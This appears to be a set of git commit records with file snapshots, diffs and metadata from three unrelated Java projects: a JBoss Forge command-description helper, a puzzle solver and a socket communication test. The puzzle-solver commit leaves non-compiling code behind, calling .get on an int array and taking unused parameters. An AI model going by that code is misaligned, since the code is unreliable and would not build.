selectComponent.getValueChoices()) { Object itemUnwrapped = Proxies.unwrap(valueChoice); String label = inputConverter.convert(itemUnwrapped); valueChoices.add(describeValueChoice(label, itemUnwrapped)); } objBuilder.add("valueChoices", valueChoices); if (input instanceof UISelectMany) { objBuilder.add("class", UISelectMany.class.getSimpleName()); } else { objBuilder.add("class", UISelectOne.class.getSimpleName()); } } else { if (input instanceof UIInputMany) { objBuilder.add("class", UIInputMany.class.getSimpleName()); } else { objBuilder.add("class", UIInput.class.getSimpleName()); } } if (inputConverter == null) { inputConverter = (Converter<Object, String>) converterFactory .getConverter(input.getValueType(), String.class); } if (input instanceof ManyValued) { ManyValued<?, Object> many = (ManyValued<?, Object>) input; JsonArrayBuilder manyValues = createArrayBuilder(); for (Object item : many.getValue()) { manyValues.add(inputConverter.convert(Proxies.unwrap(item))); } objBuilder.add("value", manyValues); } else { SingleValued<?, Object> single = (SingleValued<?, Object>) input; Object value = single.getValue(); if (value != null && !(value instanceof Number) && !(value instanceof Boolean)) { value = inputConverter.convert(Proxies.unwrap(value)); } addOptional(objBuilder, "value", value); } if (input instanceof HasCompleter) { HasCompleter<?, Object> hasCompleter = (HasCompleter<?, Object>) input; UICompleter<Object> completer = hasCompleter.getCompleter(); if (completer != null) { JsonArrayBuilder typeAheadData = createArrayBuilder(); Iterable<Object> valueChoices = completer.getCompletionProposals(controller.getContext(), (InputComponent<?, Object>) input, ""); for (Object valueChoice : valueChoices) { typeAheadData.add(inputConverter.convert(Proxies.unwrap(valueChoice))); } objBuilder.add("typeAheadData", typeAheadData); } } inputBuilder.add(objBuilder); } builder.add("inputs", inputBuilder); } public void describeValidation(JsonObjectBuilder builder, CommandController controller) { // Add messages JsonArrayBuilder messages = createArrayBuilder(); for (UIMessage message : controller.validate()) { JsonObjectBuilder messageObj = createObjectBuilder() .add("description", message.getDescription()) .add("severity", message.getSeverity().name()); if (message.getSource() != null) messageObj.add("input", message.getSource().getName()); messages.add(messageObj); } builder.add("messages", messages); } public void describeExecution(JsonObjectBuilder builder, CommandController controller) throws Exception { Result result = controller.execute(); describeResult(builder, result); // Get out and err RestUIProvider provider = (RestUIProvider) controller.getContext().getProvider(); builder.add("out", provider.getOut()); builder.add("err", provider.getErr()); } public void populateControllerAllInputs(JsonObject content, CommandController controller) throws Exception { populateController(content, controller); int stepIndex = content.getInt("stepIndex", 0); if (controller instanceof WizardCommandController) { WizardCommandController wizardController = (WizardCommandController) controller; for (int i = 0; i < stepIndex && wizardController.canMoveToNextStep(); i++) { wizardController.next().initialize(); populateController(content, wizardController); } } } public void populateController(JsonObject content, CommandController controller) { JsonArray inputArray = content.getJsonArray("inputs"); for (int i = 0; i < inputArray.size(); i++) { JsonObject input = inputArray.getJsonObject(i); String inputName = input.getString("name"); JsonValue valueObj = input.get("value"); Object inputValue = null; if (valueObj != null) { switch (valueObj.getValueType()) { case ARRAY: ArrayList<String> list = new ArrayList<>(); for (JsonValue value : (JsonArray) valueObj) { if (value.getValueType() == ValueType.STRING) { list.add(((JsonString) value).getString()); } } inputValue = list; break; case FALSE: inputValue = false; break; case TRUE: inputValue = true; break; case NUMBER: inputValue = ((JsonNumber) valueObj).intValue(); break; case STRING: inputValue = ((JsonString) valueObj).getString(); break; default: break; } } if (controller.hasInput(inputName) && inputValue != null) controller.setValueFor(inputName, inputValue); } } public void describeResult(JsonObjectBuilder builder, Result result) { JsonArrayBuilder array = createArrayBuilder(); collectResults(array, result); builder.add("results", array); } protected void collectResults(JsonArrayBuilder results, Result result) { if (result instanceof CompositeResult) { for (Result r : ((CompositeResult) result).getResults()) { collectResults(results, r); } } else { results.add(describeSingleResult(result)); } } protected JsonObjectBuilder describeValueChoice(String label, Object obj) { JsonObjectBuilder builder = createObjectBuilder(); builder.add("id", label); if (!(obj instanceof String) && !(obj instanceof Number) && !(obj instanceof Boolean)) { try { BeanInfo beanInfo = Introspector.getBeanInfo(obj.getClass()); for (PropertyDescriptor pd : beanInfo.getPropertyDescriptors()) { // Ignore class attribute from Object.class and do not override id String name = pd.getName(); if ("id".equals(name) || "class".equals(name)) { continue; } Method readMethod = pd.getReadMethod(); if (readMethod != null) { try { addOptional(builder, name, readMethod.invoke(obj)); } catch (Exception e) { // Ignore // e.printStackTrace(); } } } } catch (IntrospectionException ie) { // ignore // ie.printStackTrace(); } } return builder; } protected JsonObjectBuilder describeSingleResult(Result result) { JsonObjectBuilder builder = createObjectBuilder(); builder.add("status", (result instanceof Failed) ? "FAILED" : "SUCCESS"); if (result != null) addOptional(builder, "message", result.getMessage()); return builder; } protected void addOptional(JsonObjectBuilder builder, String name, Object value) { if (value != null) { if (value instanceof Boolean) { builder.add(name, (Boolean) value); } else if (value instanceof Number) { builder.add(name, ((Number) value).intValue()); } else { builder.add(name, value.toString()); } } } }
core/src/main/java/org/jboss/forge/service/util/UICommandHelper.java
/* * Copyright 2015 Red Hat, Inc. and/or its affiliates. * * Licensed under the Eclipse Public License version 1.0, available at * http://www.eclipse.org/legal/epl-v10.html */ package org.jboss.forge.service.util; import static javax.json.Json.createArrayBuilder; import static javax.json.Json.createObjectBuilder; import java.beans.BeanInfo; import java.beans.IntrospectionException; import java.beans.Introspector; import java.beans.PropertyDescriptor; import java.lang.reflect.Method; import java.util.ArrayList; import javax.inject.Inject; import javax.json.JsonArray; import javax.json.JsonArrayBuilder; import javax.json.JsonNumber; import javax.json.JsonObject; import javax.json.JsonObjectBuilder; import javax.json.JsonString; import javax.json.JsonValue; import javax.json.JsonValue.ValueType; import org.jboss.forge.addon.convert.Converter; import org.jboss.forge.addon.convert.ConverterFactory; import org.jboss.forge.addon.ui.controller.CommandController; import org.jboss.forge.addon.ui.controller.WizardCommandController; import org.jboss.forge.addon.ui.input.HasCompleter; import org.jboss.forge.addon.ui.input.InputComponent; import org.jboss.forge.addon.ui.input.ManyValued; import org.jboss.forge.addon.ui.input.SelectComponent; import org.jboss.forge.addon.ui.input.SingleValued; import org.jboss.forge.addon.ui.input.UICompleter; import org.jboss.forge.addon.ui.input.UIInput; import org.jboss.forge.addon.ui.input.UIInputMany; import org.jboss.forge.addon.ui.input.UISelectMany; import org.jboss.forge.addon.ui.input.UISelectOne; import org.jboss.forge.addon.ui.metadata.UICommandMetadata; import org.jboss.forge.addon.ui.output.UIMessage; import org.jboss.forge.addon.ui.result.CompositeResult; import org.jboss.forge.addon.ui.result.Failed; import org.jboss.forge.addon.ui.result.Result; import org.jboss.forge.addon.ui.util.InputComponents; import org.jboss.forge.furnace.proxy.Proxies; import org.jboss.forge.service.ui.RestUIProvider; /** * Describes commands * * @author <a href="mailto:[email protected]">George Gastaldi</a> */ public class UICommandHelper { private final ConverterFactory converterFactory; @Inject public UICommandHelper(ConverterFactory converterFactory) { this.converterFactory = converterFactory; } public void describeController(JsonObjectBuilder builder, CommandController controller) { describeMetadata(builder, controller); describeCurrentState(builder, controller); describeInputs(builder, controller); } public void describeCurrentState(JsonObjectBuilder builder, CommandController controller) { JsonObjectBuilder stateBuilder = createObjectBuilder(); stateBuilder.add("valid", controller.isValid()); stateBuilder.add("canExecute", controller.canExecute()); if (controller instanceof WizardCommandController) { stateBuilder.add("wizard", true); stateBuilder.add("canMoveToNextStep", ((WizardCommandController) controller).canMoveToNextStep()); stateBuilder.add("canMoveToPreviousStep", ((WizardCommandController) controller).canMoveToPreviousStep()); } else { stateBuilder.add("wizard", false); } builder.add("state", stateBuilder); } public void describeMetadata(JsonObjectBuilder builder, CommandController controller) { UICommandMetadata metadata = controller.getMetadata(); JsonObjectBuilder metadataBuilder = createObjectBuilder(); metadataBuilder.add("deprecated", metadata.isDeprecated()); addOptional(metadataBuilder, "category", metadata.getCategory()); addOptional(metadataBuilder, "name", metadata.getName()); addOptional(metadataBuilder, "description", metadata.getDescription()); addOptional(metadataBuilder, "deprecatedMessage", metadata.getDeprecatedMessage()); builder.add("metadata", metadataBuilder); } @SuppressWarnings("unchecked") public void describeInputs(JsonObjectBuilder builder, CommandController controller) { // Add inputs JsonArrayBuilder inputBuilder = createArrayBuilder(); for (InputComponent<?, ?> input : controller.getInputs().values()) { JsonObjectBuilder objBuilder = createObjectBuilder() .add("name", input.getName()) .add("shortName", String.valueOf(input.getShortName())) .add("valueType", input.getValueType().getName()) .add("inputType", InputComponents.getInputType(input)) .add("enabled", input.isEnabled()) .add("required", input.isRequired()) .add("deprecated", input.isDeprecated()) .add("label", InputComponents.getLabelFor(input, false)); addOptional(objBuilder, "description", input.getDescription()); addOptional(objBuilder, "note", input.getNote()); Converter<Object, String> inputConverter = null; if (input instanceof SelectComponent) { SelectComponent<?, Object> selectComponent = (SelectComponent<?, Object>) input; inputConverter = InputComponents.getItemLabelConverter(converterFactory, selectComponent); JsonArrayBuilder valueChoices = createArrayBuilder(); for (Object valueChoice : selectComponent.getValueChoices()) { Object itemUnwrapped = Proxies.unwrap(valueChoice); String label = inputConverter.convert(itemUnwrapped); valueChoices.add(describeValueChoice(label, itemUnwrapped)); } objBuilder.add("valueChoices", valueChoices); if (input instanceof UISelectMany) { objBuilder.add("class", UISelectMany.class.getSimpleName()); } else { objBuilder.add("class", UISelectOne.class.getSimpleName()); } } else { if (input instanceof UIInputMany) { objBuilder.add("class", UIInputMany.class.getSimpleName()); } else { objBuilder.add("class", UIInput.class.getSimpleName()); } } if (inputConverter == null) { inputConverter = (Converter<Object, String>) converterFactory .getConverter(input.getValueType(), String.class); } if (input instanceof ManyValued) { ManyValued<?, Object> many = (ManyValued<?, Object>) input; JsonArrayBuilder manyValues = createArrayBuilder(); for (Object item : many.getValue()) { manyValues.add(inputConverter.convert(Proxies.unwrap(item))); } objBuilder.add("value", manyValues); } else { SingleValued<?, Object> single = (SingleValued<?, Object>) input; Object value = single.getValue(); if (value != null && !(value instanceof Number) && !(value instanceof Boolean)) { value = inputConverter.convert(Proxies.unwrap(value)); } addOptional(objBuilder, "value", value); } if (input instanceof HasCompleter) { HasCompleter<?, Object> hasCompleter = (HasCompleter<?, Object>) input; UICompleter<Object> completer = hasCompleter.getCompleter(); if (completer != null) { JsonArrayBuilder typeAheadData = createArrayBuilder(); Iterable<Object> valueChoices = completer.getCompletionProposals(controller.getContext(), (InputComponent<?, Object>) input, ""); for (Object valueChoice : valueChoices) { typeAheadData.add(inputConverter.convert(Proxies.unwrap(valueChoice))); } objBuilder.add("typeAheadData", typeAheadData); } } inputBuilder.add(objBuilder); } builder.add("inputs", inputBuilder); } public void describeValidation(JsonObjectBuilder builder, CommandController controller) { // Add messages JsonArrayBuilder messages = createArrayBuilder(); for (UIMessage message : controller.validate()) { JsonObjectBuilder messageObj = createObjectBuilder() .add("description", message.getDescription()) .add("severity", message.getSeverity().name()); if (message.getSource() != null) messageObj.add("input", message.getSource().getName()); messages.add(messageObj); } builder.add("messages", messages); } public void describeExecution(JsonObjectBuilder builder, CommandController controller) throws Exception { Result result = controller.execute(); describeResult(builder, result); // Get out and err RestUIProvider provider = (RestUIProvider) controller.getContext().getProvider(); builder.add("out", provider.getOut()); builder.add("err", provider.getErr()); } public void populateControllerAllInputs(JsonObject content, CommandController controller) throws Exception { populateController(content, controller); int stepIndex = content.getInt("stepIndex", 0); if (controller instanceof WizardCommandController) { WizardCommandController wizardController = (WizardCommandController) controller; for (int i = 0; i < stepIndex && wizardController.canMoveToNextStep(); i++) { wizardController.next().initialize(); populateController(content, wizardController); } } } public void populateController(JsonObject content, CommandController controller) { JsonArray inputArray = content.getJsonArray("inputs"); for (int i = 0; i < inputArray.size(); i++) { JsonObject input = inputArray.getJsonObject(i); String inputName = input.getString("name"); JsonValue valueObj = input.get("value"); Object inputValue = null; if (valueObj != null) { switch (valueObj.getValueType()) { case ARRAY: ArrayList<String> list = new ArrayList<>(); for (JsonValue value : (JsonArray) valueObj) { if (value.getValueType() == ValueType.STRING) { list.add(((JsonString) value).getString()); } } inputValue = list; break; case FALSE: inputValue = false; break; case TRUE: inputValue = true; break; case NUMBER: inputValue = ((JsonNumber) valueObj).intValue(); break; case STRING: inputValue = ((JsonString) valueObj).getString(); break; default: break; } } if (controller.hasInput(inputName) && inputValue != null) controller.setValueFor(inputName, inputValue); } } public void describeResult(JsonObjectBuilder builder, Result result) { JsonArrayBuilder array = createArrayBuilder(); collectResults(array, result); builder.add("results", array); } protected void collectResults(JsonArrayBuilder results, Result result) { if (result instanceof CompositeResult) { for (Result r : ((CompositeResult) result).getResults()) { collectResults(results, r); } } else { results.add(describeSingleResult(result)); } } protected JsonObjectBuilder describeValueChoice(String label, Object obj) { JsonObjectBuilder builder = createObjectBuilder(); builder.add("id", label); if (!(obj instanceof String) && !(obj instanceof Number) && !(obj instanceof Boolean)) { try { BeanInfo beanInfo = Introspector.getBeanInfo(obj.getClass()); for (PropertyDescriptor pd : beanInfo.getPropertyDescriptors()) { // Ignore class attribute from Object.class String name = pd.getName(); if ("class".equals(name)) { continue; } Method readMethod = pd.getReadMethod(); if (readMethod != null) { try { addOptional(builder, name, readMethod.invoke(obj)); } catch (Exception e) { // Ignore // e.printStackTrace(); } } } } catch (IntrospectionException ie) { // ignore // ie.printStackTrace(); } } return builder; } protected JsonObjectBuilder describeSingleResult(Result result) { JsonObjectBuilder builder = createObjectBuilder(); builder.add("status", (result instanceof Failed) ? "FAILED" : "SUCCESS"); if (result != null) addOptional(builder, "message", result.getMessage()); return builder; } protected void addOptional(JsonObjectBuilder builder, String name, Object value) { if (value != null) { if (value instanceof Boolean) { builder.add(name, (Boolean) value); } else if (value instanceof Number) { builder.add(name, ((Number) value).intValue()); } else { builder.add(name, value.toString()); } } } }
Do not override Id
core/src/main/java/org/jboss/forge/service/util/UICommandHelper.java
Do not override Id
<ide><path>ore/src/main/java/org/jboss/forge/service/util/UICommandHelper.java <ide> BeanInfo beanInfo = Introspector.getBeanInfo(obj.getClass()); <ide> for (PropertyDescriptor pd : beanInfo.getPropertyDescriptors()) <ide> { <del> // Ignore class attribute from Object.class <add> // Ignore class attribute from Object.class and do not override id <ide> String name = pd.getName(); <del> if ("class".equals(name)) <add> if ("id".equals(name) || "class".equals(name)) <ide> { <ide> continue; <ide> }
Java
mit
8b6fd8a836d7be9d36bb2485afbfaabb866f5818
0
Fantast/project-euler,Fantast/project-euler,Fantast/project-euler,Fantast/project-euler,Fantast/project-euler,Fantast/project-euler
package opener15; import tasks.AbstractTask; import tasks.Tester; import utils.log.Logger; import utils.pairs.IntPair; import utils.triples.IntTriple; import java.util.*; //Answer : public class Task_34_3 extends AbstractTask { public static void main(String[] args) { Logger.init("default.log"); Tester.test(new Task_34_3()); Logger.close(); } int primes[][] = new int[][]{ new int[]{2, 3, 4}, new int[]{2, 4, 4}, new int[]{2, 4, 5}, new int[]{6, 6, 6}, new int[]{2, 6, 10} }; boolean can[][][] = new boolean[100][100][100]; List<IntTriple> tmp = new ArrayList<>(); List<IntTriple> news = new ArrayList<>(); List<IntTriple> news2 = new ArrayList<>(); int tmpindex[][][] = new int[100][100][100]; int index1[][][] = new int[100][100][100]; int index2[][][] = new int[100][100][100]; int index_n1[][] = new int[100][100]; int index_n2[][] = new int[100][100]; public void solving() { for (int[] p : primes) { put(p[0], p[1], p[2]); } while (news.size() != 0) { System.out.println("News: " + news.size()); news2.clear(); for (IntTriple tn : news) { // multiply(tn); combine(tn); } } long res = 0; for (int a = 1; a < 100; a++) { for (int b = a; b < 100; b++) { for (int c = b; c < 100; c++) { if (can[a][b][c]) { res += Long.parseLong("" + a + b + c); } } } } System.out.println(res); } private void multiply(IntTriple tn) { for (int a = tn.a; a < 100; a += tn.a) { for (int b = closest(a, tn.b); b < 100; b += tn.b) { for (int c = closest(b, tn.c); c < 100; c += tn.c) { if (!can[a][b][c]) { put(a,b,c); } } } } } private void put(int a, int b, int c) { indexx(a, b, c); indexx(a, c, b); indexx(b, a, c); indexx(b, c, a); indexx(c, a, b); indexx(c, b, a); news2.add(sortedTriple(a, b, c)); } private void indexx(int a, int b, int c) { can[a][b][c] = true; index2[a][b][index_n2[a][b]++] = c; } private int closest(int a, int b) { if (a%b == 0) { return a; } return (a/b+1)*b; } void combine(IntTriple t) { putnew(t.a, t.b, t.c, index1.get(MnMxPair(t.a, t.b))); putnew(t.a, t.c, t.b, index1.get(MnMxPair(t.a, t.c))); putnew(t.b, t.c, t.a, index1.get(MnMxPair(t.b, t.c))); } void putnew(int a, int b, int c1, List<Integer> cc) { int indexLen = index_n1[a][b]; for (int i = 0; i < indexLen; ++i) { int c2 = index1[a][b][i]; for (int c = c1; c < 100; c += c2) { if (!can[a][b][c]) { put(a, b, c); } } for (int c = c2; c < 100; c += c1) { sr[0] = a; sr[1] = b; sr[2] = c; Arrays.sort(sr); if (sr[2] < 100 && !can[sr[0]][sr[1]][sr[2]]) { can[sr[0]][sr[1]][sr[2]] = true; news2.add(new IntTriple(sr[0], sr[1], sr[2])); } } } } void combine(IntTriple t1, IntTriple t2) { putnew(t1.a, t1.b, t1.c, t2.a, t2.b, t2.c); putnew(t1.a, t1.c, t1.b, t2.a, t2.c, t2.b); putnew(t1.b, t1.a, t1.c, t2.b, t2.a, t2.c); putnew(t1.b, t1.c, t1.a, t2.b, t2.c, t2.a); putnew(t1.c, t1.a, t1.b, t2.c, t2.a, t2.b); putnew(t1.c, t1.b, t1.a, t2.c, t2.b, t2.a); } private void putnew(int a1, int b1, int c1, int a2, int b2, int c2) { if (a1 == a2 && b1 == b2) { putnew(a1, b1, c1, c2); } } int sr[] = new int[3]; private void putnew(int a, int b, int c1, int c2) { for (int c = c1; c < 100; c += c2) { sr[0] = a; sr[1] = b; sr[2] = c; Arrays.sort(sr); if (sr[2] < 100 && !can[sr[0]][sr[1]][sr[2]]) { can[sr[0]][sr[1]][sr[2]] = true; news2.add(new IntTriple(sr[0], sr[1], sr[2])); } } for (int c = c2; c < 100; c += c1) { sr[0] = a; sr[1] = b; sr[2] = c; Arrays.sort(sr); if (sr[2] < 100 && !can[sr[0]][sr[1]][sr[2]]) { can[sr[0]][sr[1]][sr[2]] = true; news2.add(new IntTriple(sr[0], sr[1], sr[2])); } } } int st[] = new int[3]; IntTriple sortedTriple(int a, int b, int c) { st[0] = a; st[1] = b; st[2] = c; Arrays.sort(st); return new IntTriple(st[0], st[1], st[2]); } static IntPair MnMxPair(int a, int b) { return new IntPair(Math.min(a, b), Math.max(a, b)); } }
src/main/opener2015/opener15/Task_34_3.java
package opener15; import tasks.AbstractTask; import tasks.Tester; import utils.log.Logger; import utils.triples.IntTriple; import java.util.ArrayList; import java.util.Arrays; import java.util.List; //Answer : public class Task_34_3 extends AbstractTask { public static void main(String[] args) { Logger.init("default.log"); Tester.test(new Task_34_3()); Logger.close(); } int basic[][] = new int[][]{ new int[]{2, 3, 4}, new int[]{2, 4, 4}, new int[]{2, 4, 5}, new int[]{6, 6, 6}, new int[]{2, 6, 10} }; int primes[][] = new int[30][3]; boolean can[][][] = new boolean[100][100][100]; List<IntTriple> olds = new ArrayList<>(); List<IntTriple> tmp = new ArrayList<>(); List<IntTriple> news = new ArrayList<>(); List<IntTriple> news2 = new ArrayList<>(); public void solving() { // createPrimes(); primes = basic; for (int[] p : primes) { olds.add(new IntTriple(p[0], p[1], p[2])); } news = new ArrayList<>(olds); while (news.size() != 0) { System.out.println("News: " + news.size() + "; Olds: " + olds.size()); news2.clear(); for (IntTriple to : olds) { for (IntTriple tn : news) { combine(to, tn); } } olds.addAll(news2); tmp = news; news = news2; news2 = tmp; } long res = 0; for(IntTriple t : olds) { res += Long.parseLong("" + t.a + t.b + t.c); } System.out.println(res); } void combine(IntTriple t1, IntTriple t2) { putnew(t1.a, t1.b, t1.c, t2.a, t2.b, t2.c); putnew(t1.a, t1.c, t1.b, t2.a, t2.c, t2.b); putnew(t1.b, t1.a, t1.c, t2.b, t2.a, t2.c); putnew(t1.b, t1.c, t1.a, t2.b, t2.c, t2.a); putnew(t1.c, t1.a, t1.b, t2.c, t2.a, t2.b); putnew(t1.c, t1.b, t1.a, t2.c, t2.b, t2.a); } private void putnew(int a1, int b1, int c1, int a2, int b2, int c2) { if (a1 == a2 && b1 == b2) { putnew(a1, b1, c1, c2); } } int sr[] = new int[3]; private void putnew(int a, int b, int c1, int c2) { for (int c = c1; c < 100; c += c2) { sr[0] = a; sr[1] = b; sr[2] = c; Arrays.sort(sr); if (sr[2] < 100 && !can[sr[0]][sr[1]][sr[2]]) { can[sr[0]][sr[1]][sr[2]] = true; news2.add(new IntTriple(sr[0], sr[1], sr[2])); } } for (int c = c2; c < 100; c += c1) { sr[0] = a; sr[1] = b; sr[2] = c; Arrays.sort(sr); if (sr[2] < 100 && !can[sr[0]][sr[1]][sr[2]]) { can[sr[0]][sr[1]][sr[2]] = true; news2.add(new IntTriple(sr[0], sr[1], sr[2])); } } } }
opener 2015
src/main/opener2015/opener15/Task_34_3.java
opener 2015
<ide><path>rc/main/opener2015/opener15/Task_34_3.java <ide> import tasks.AbstractTask; <ide> import tasks.Tester; <ide> import utils.log.Logger; <add>import utils.pairs.IntPair; <ide> import utils.triples.IntTriple; <ide> <del>import java.util.ArrayList; <del>import java.util.Arrays; <del>import java.util.List; <add>import java.util.*; <ide> <ide> //Answer : <ide> public class Task_34_3 extends AbstractTask { <ide> Logger.close(); <ide> } <ide> <del> int basic[][] = new int[][]{ <add> int primes[][] = new int[][]{ <ide> new int[]{2, 3, 4}, <ide> new int[]{2, 4, 4}, <ide> new int[]{2, 4, 5}, <ide> new int[]{6, 6, 6}, <ide> new int[]{2, 6, 10} <ide> }; <del> int primes[][] = new int[30][3]; <ide> boolean can[][][] = new boolean[100][100][100]; <ide> <del> List<IntTriple> olds = new ArrayList<>(); <ide> List<IntTriple> tmp = new ArrayList<>(); <ide> List<IntTriple> news = new ArrayList<>(); <ide> List<IntTriple> news2 = new ArrayList<>(); <ide> <add> int tmpindex[][][] = new int[100][100][100]; <add> int index1[][][] = new int[100][100][100]; <add> int index2[][][] = new int[100][100][100]; <add> <add> int index_n1[][] = new int[100][100]; <add> int index_n2[][] = new int[100][100]; <add> <ide> public void solving() { <del>// createPrimes(); <del> primes = basic; <ide> for (int[] p : primes) { <del> olds.add(new IntTriple(p[0], p[1], p[2])); <add> put(p[0], p[1], p[2]); <ide> } <del> news = new ArrayList<>(olds); <ide> <ide> while (news.size() != 0) { <del> System.out.println("News: " + news.size() + "; Olds: " + olds.size()); <add> System.out.println("News: " + news.size()); <ide> news2.clear(); <del> for (IntTriple to : olds) { <del> for (IntTriple tn : news) { <del> combine(to, tn); <del> } <add> <add> for (IntTriple tn : news) { <add>// multiply(tn); <add> combine(tn); <ide> } <del> olds.addAll(news2); <del> tmp = news; <del> news = news2; <del> news2 = tmp; <ide> } <ide> <ide> long res = 0; <del> for(IntTriple t : olds) { <del> res += Long.parseLong("" + t.a + t.b + t.c); <add> for (int a = 1; a < 100; a++) { <add> for (int b = a; b < 100; b++) { <add> for (int c = b; c < 100; c++) { <add> if (can[a][b][c]) { <add> res += Long.parseLong("" + a + b + c); <add> } <add> } <add> } <ide> } <ide> System.out.println(res); <add> } <add> <add> private void multiply(IntTriple tn) { <add> for (int a = tn.a; a < 100; a += tn.a) { <add> for (int b = closest(a, tn.b); b < 100; b += tn.b) { <add> for (int c = closest(b, tn.c); c < 100; c += tn.c) { <add> if (!can[a][b][c]) { <add> put(a,b,c); <add> } <add> } <add> } <add> } <add> } <add> <add> private void put(int a, int b, int c) { <add> indexx(a, b, c); <add> indexx(a, c, b); <add> indexx(b, a, c); <add> indexx(b, c, a); <add> indexx(c, a, b); <add> indexx(c, b, a); <add> news2.add(sortedTriple(a, b, c)); <add> } <add> <add> private void indexx(int a, int b, int c) { <add> can[a][b][c] = true; <add> index2[a][b][index_n2[a][b]++] = c; <add> } <add> <add> private int closest(int a, int b) { <add> if (a%b == 0) { <add> return a; <add> } <add> return (a/b+1)*b; <add> } <add> <add> void combine(IntTriple t) { <add> putnew(t.a, t.b, t.c, index1.get(MnMxPair(t.a, t.b))); <add> putnew(t.a, t.c, t.b, index1.get(MnMxPair(t.a, t.c))); <add> putnew(t.b, t.c, t.a, index1.get(MnMxPair(t.b, t.c))); <add> } <add> <add> void putnew(int a, int b, int c1, List<Integer> cc) { <add> int indexLen = index_n1[a][b]; <add> for (int i = 0; i < indexLen; ++i) { <add> int c2 = index1[a][b][i]; <add> <add> for (int c = c1; c < 100; c += c2) { <add> if (!can[a][b][c]) { <add> put(a, b, c); <add> } <add> } <add> for (int c = c2; c < 100; c += c1) { <add> sr[0] = a; <add> sr[1] = b; <add> sr[2] = c; <add> Arrays.sort(sr); <add> <add> if (sr[2] < 100 && !can[sr[0]][sr[1]][sr[2]]) { <add> can[sr[0]][sr[1]][sr[2]] = true; <add> news2.add(new IntTriple(sr[0], sr[1], sr[2])); <add> } <add> } <add> } <ide> } <ide> <ide> void combine(IntTriple t1, IntTriple t2) { <ide> } <ide> } <ide> } <add> <add> int st[] = new int[3]; <add> IntTriple sortedTriple(int a, int b, int c) { <add> st[0] = a; <add> st[1] = b; <add> st[2] = c; <add> Arrays.sort(st); <add> return new IntTriple(st[0], st[1], st[2]); <add> } <add> <add> static IntPair MnMxPair(int a, int b) { <add> return new IntPair(Math.min(a, b), Math.max(a, b)); <add> } <ide> }
Java
mit
7abec165f1ac1b587de3af84729b1e0961d9f610
0
marcoFuschini/ISLT2013gruppo14
package it.unibo.IngSW.Tests.FanDevice; import static org.junit.Assert.*; import it.unibo.IngSW.ControlUnit.ControlUnitCommunicator; import it.unibo.IngSW.FanDevice.FanDeviceCommunicator; import it.unibo.IngSW.Viewer.ViewerCommunicator; import it.unibo.IngSW.common.SensorData; import it.unibo.IngSW.common.interfaces.ISensorData; import it.unibo.IngSW.utils.JSONConverter; import org.junit.Assert; import org.junit.Test; public class ServerComunicatorTest { private static final int CUPORT=10001; private static final int VPORT=10002; private FanDeviceCommunicator fdcomm=new FanDeviceCommunicator(); private ViewerCommunicator vcomm1=new ViewerCommunicator(); private ViewerCommunicator vcomm2=new ViewerCommunicator(); private ControlUnitCommunicator ccomm=new ControlUnitCommunicator(); private void scrivi(String s){ System.out.println(s); } @Test public void test() { Thread t = new Thread(new Runnable() { @Override public void run() { try { fdcomm.connect(VPORT, CUPORT); String s=fdcomm.receiveCommand(); scrivi(s); fdcomm.sendData(new ISensorData[]{new SensorData("nome1", "val1")}); ok(); fdcomm.sendData(new ISensorData[]{new SensorData("nome1", "val1")}); fdcomm.disconnect(); } catch (Exception e) { e.printStackTrace(); return; } } }); t.start(); try { ccomm.connect("127.0.0.1", CUPORT); vcomm1.connect("127.0.0.1", VPORT); vcomm2.connect("127.0.0.1", VPORT); ccomm.sendCommand(JSONConverter.commandToJSON("START")); ISensorData[] data1=vcomm1.receiveData(); ISensorData[] data2=vcomm2.receiveData(); assertTrue(data1.equals(data2)); ccomm.disconnect(); vcomm1.disconnect(); vcomm2.disconnect(); } catch (Exception e) { e.printStackTrace(); } } private void ok() { System.out.println("ok"); } }
FanDeviceSystemTESTS/src/it/unibo/IngSW/Tests/FanDevice/ServerComunicatorTest.java
package it.unibo.IngSW.Tests.FanDevice; import static org.junit.Assert.*; import it.unibo.IngSW.ControlUnit.ControlUnitCommunicator; import it.unibo.IngSW.FanDevice.FanDeviceCommunicator; import it.unibo.IngSW.Viewer.ViewerCommunicator; import it.unibo.IngSW.common.interfaces.ISensorData; import it.unibo.IngSW.utils.JSONConverter; import org.junit.Assert; import org.junit.Test; public class ServerComunicatorTest { private static final int CUPORT=10001; private static final int VPORT=10002; private FanDeviceCommunicator fdcomm=new FanDeviceCommunicator(); private ViewerCommunicator vcomm1=new ViewerCommunicator(); private ViewerCommunicator vcomm2=new ViewerCommunicator(); private ControlUnitCommunicator ccomm=new ControlUnitCommunicator(); private void scrivi(String s){ System.out.println(s); } @Test public void test() { Thread t = new Thread(new Runnable() { @Override public void run() { try { fdcomm.connect(VPORT, CUPORT); String s=fdcomm.receiveCommand(); scrivi(s); fdcomm.disconnect(); } catch (Exception e) { e.printStackTrace(); return; } } }); t.start(); try { ccomm.connect("127.0.0.1", CUPORT); vcomm1.connect("127.0.0.1", VPORT); vcomm2.connect("127.0.0.1", VPORT); ccomm.sendCommand(JSONConverter.commandToJSON("START")); ISensorData[] data1=vcomm1.receiveData(); ISensorData[] data2=vcomm2.receiveData(); assertTrue(data1.equals(data2)); ccomm.disconnect(); vcomm1.disconnect(); vcomm2.disconnect(); } catch (Exception e) { e.printStackTrace(); } } }
Signed-off-by: Marco <Marco@MarcoFisso>
FanDeviceSystemTESTS/src/it/unibo/IngSW/Tests/FanDevice/ServerComunicatorTest.java
<ide><path>anDeviceSystemTESTS/src/it/unibo/IngSW/Tests/FanDevice/ServerComunicatorTest.java <ide> import it.unibo.IngSW.ControlUnit.ControlUnitCommunicator; <ide> import it.unibo.IngSW.FanDevice.FanDeviceCommunicator; <ide> import it.unibo.IngSW.Viewer.ViewerCommunicator; <add>import it.unibo.IngSW.common.SensorData; <ide> import it.unibo.IngSW.common.interfaces.ISensorData; <ide> import it.unibo.IngSW.utils.JSONConverter; <ide> <ide> fdcomm.connect(VPORT, CUPORT); <ide> String s=fdcomm.receiveCommand(); <ide> scrivi(s); <add> fdcomm.sendData(new ISensorData[]{new SensorData("nome1", "val1")}); <add> ok(); <add> fdcomm.sendData(new ISensorData[]{new SensorData("nome1", "val1")}); <ide> <ide> fdcomm.disconnect(); <ide> } catch (Exception e) { <ide> } <ide> <ide> } <add> <add> private void ok() { <add> System.out.println("ok"); <add> } <ide> <ide> <ide> }
Java
mit
5d6f743bb02c78614fb9e2d9513980700f0cd869
0
fighter0ik/slf4j-android
